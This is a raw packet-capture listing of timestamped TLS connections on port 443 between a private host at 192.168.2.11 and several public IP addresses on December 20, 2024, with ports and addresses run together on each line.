                                                                                                                                                                                                                                                Dec 20, 2024 16:46:05.900295973 CET44349884104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:05.903409004 CET44349883104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:05.903470039 CET49883443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:05.903477907 CET44349883104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:05.908127069 CET44349884104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:05.908243895 CET49884443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:05.908253908 CET44349884104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:05.908268929 CET44349884104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:05.908499002 CET49884443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:05.908845901 CET49884443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:05.908862114 CET44349884104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:05.913542986 CET49891443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:05.913583040 CET44349891104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:05.913645029 CET49891443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:05.913863897 CET49891443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:05.913875103 CET44349891104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:05.918772936 CET44349883104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:05.918828964 CET49883443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:05.918838024 CET44349883104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:05.926929951 CET44349883104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:05.926964998 CET44349883104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:05.926983118 CET49883443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:05.926992893 CET44349883104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:05.927105904 CET49883443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:06.033562899 CET44349883104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:06.033632994 CET44349883104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:06.033664942 CET49883443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:06.033683062 CET44349883104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:06.033705950 CET44349883104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:06.033756018 CET49883443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:06.034111023 CET49883443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:06.034126043 CET44349883104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:06.939097881 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:06.939416885 CET49890443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:06.939438105 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:06.939802885 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:06.940129995 CET49890443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:06.940201998 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:06.940274000 CET49890443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:06.987329960 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.127135038 CET44349891104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.129933119 CET49891443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.129956007 CET44349891104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.130281925 CET44349891104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.130630970 CET49891443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.130691051 CET44349891104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.130803108 CET49891443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.172039032 CET49891443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.172063112 CET44349891104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.382574081 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.382630110 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.382774115 CET49890443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.382795095 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.382875919 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.382904053 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.382911921 CET49890443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.382919073 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.382967949 CET49890443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.383569002 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.390814066 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.390880108 CET49890443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.390892029 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.399220943 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.399280071 CET49890443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.399288893 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.449156046 CET49890443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.449176073 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.502461910 CET49890443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.502506018 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.548758984 CET49890443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.572351933 CET44349891104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.572437048 CET44349891104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.572524071 CET49891443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.573249102 CET49891443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.573261023 CET44349891104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.574919939 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.576132059 CET49897443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.576170921 CET44349897104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.576266050 CET49897443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.576487064 CET49897443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.576502085 CET44349897104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.578871012 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.578929901 CET49890443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.578941107 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.586766005 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.586846113 CET49890443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.586853981 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.594343901 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.594425917 CET49890443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.594434023 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.610069036 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.610160112 CET49890443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.610176086 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.617933989 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.618010044 CET49890443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.618031025 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.626023054 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.626101971 CET49890443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.626112938 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.633327007 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.633398056 CET49890443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.633409023 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.641289949 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.641357899 CET49890443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.641366005 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.648338079 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.648396015 CET49890443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.648403883 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.701952934 CET49890443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.701980114 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.747874975 CET49890443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.766951084 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.769681931 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.769742966 CET49890443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.769761086 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.774347067 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.774415970 CET49890443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.774425983 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.779072046 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.779123068 CET49890443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.779129982 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.788330078 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.788408041 CET49890443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.788415909 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.792993069 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.793075085 CET49890443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.793081045 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.793126106 CET49890443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.802656889 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.802669048 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.802762032 CET49890443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.802768946 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.802803040 CET49890443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.811678886 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.811693907 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.811765909 CET49890443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.820858955 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.820871115 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.820959091 CET49890443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.830116987 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.830130100 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.830219984 CET49890443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.835776091 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.835855007 CET49890443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.960051060 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.960122108 CET49890443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.965514898 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.965575933 CET49890443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.973036051 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.973155022 CET49890443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.977427006 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.977482080 CET49890443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.984368086 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.984421015 CET49890443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.991991043 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.992058992 CET49890443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.995881081 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:07.995944023 CET49890443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:08.003403902 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:08.003463984 CET49890443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:08.011013031 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:08.011066914 CET49890443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:08.018488884 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:08.018551111 CET49890443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:08.022329092 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:08.022378922 CET49890443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:08.022387028 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:08.022459984 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:08.022495985 CET49890443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:08.023101091 CET49890443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:08.023118019 CET44349890104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:08.064024925 CET49861443192.168.2.11172.67.134.231
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:08.111331940 CET44349861172.67.134.231192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:08.117786884 CET49898443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:08.117918968 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:08.118002892 CET49898443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:08.118347883 CET49898443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:08.118379116 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:08.196888924 CET49899443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:08.196932077 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:08.196997881 CET49899443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:08.197593927 CET49899443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:08.197607040 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:08.791127920 CET44349897104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:08.791436911 CET49897443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:08.791460991 CET44349897104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:08.791836023 CET44349897104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:08.792526960 CET49897443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:08.792618990 CET44349897104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:08.792685986 CET49897443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:08.839320898 CET44349897104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:08.965045929 CET44349861172.67.134.231192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:08.965123892 CET44349861172.67.134.231192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:08.965202093 CET49861443192.168.2.11172.67.134.231
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:08.966558933 CET49861443192.168.2.11172.67.134.231
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:08.966573000 CET44349861172.67.134.231192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.110035896 CET49900443192.168.2.1135.190.80.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.110085964 CET4434990035.190.80.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.110167027 CET49900443192.168.2.1135.190.80.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.110428095 CET49900443192.168.2.1135.190.80.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.110445023 CET4434990035.190.80.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.246658087 CET44349897104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.246732950 CET44349897104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.246857882 CET49897443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.247720957 CET49897443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.247735023 CET44349897104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.330075979 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.330388069 CET49898443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.330411911 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.330760002 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.331402063 CET49898443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.331475019 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.331696033 CET49898443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.379334927 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.409418106 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.411880016 CET49899443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.411890984 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.412435055 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.412856102 CET49899443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.412909985 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.413187027 CET49899443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.413255930 CET49899443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.413290977 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.781307936 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.781449080 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.781543016 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.781572104 CET49898443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.781608105 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.781693935 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.781743050 CET49898443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.781750917 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.781780958 CET49898443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.781801939 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.797316074 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.797419071 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.797518015 CET49898443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.797529936 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.797575951 CET49898443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.804431915 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.858953953 CET49898443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.900935888 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.929248095 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.929285049 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.929455996 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.929476023 CET49899443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.929490089 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.929539919 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.929579020 CET49899443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.929585934 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.929645061 CET49899443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.930543900 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.937725067 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.937771082 CET49899443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.937779903 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.942058086 CET49898443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.942075014 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.946470976 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.946557999 CET49899443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.946567059 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.979612112 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.979723930 CET49898443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.979748964 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.987251043 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.987339973 CET49898443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.987354994 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.987400055 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.987459898 CET49898443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.988415003 CET49899443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.988425016 CET44349899104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:09.994941950 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.002793074 CET44349898104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:10.002865076 CET49898443192.168.2.11104.18.94.41
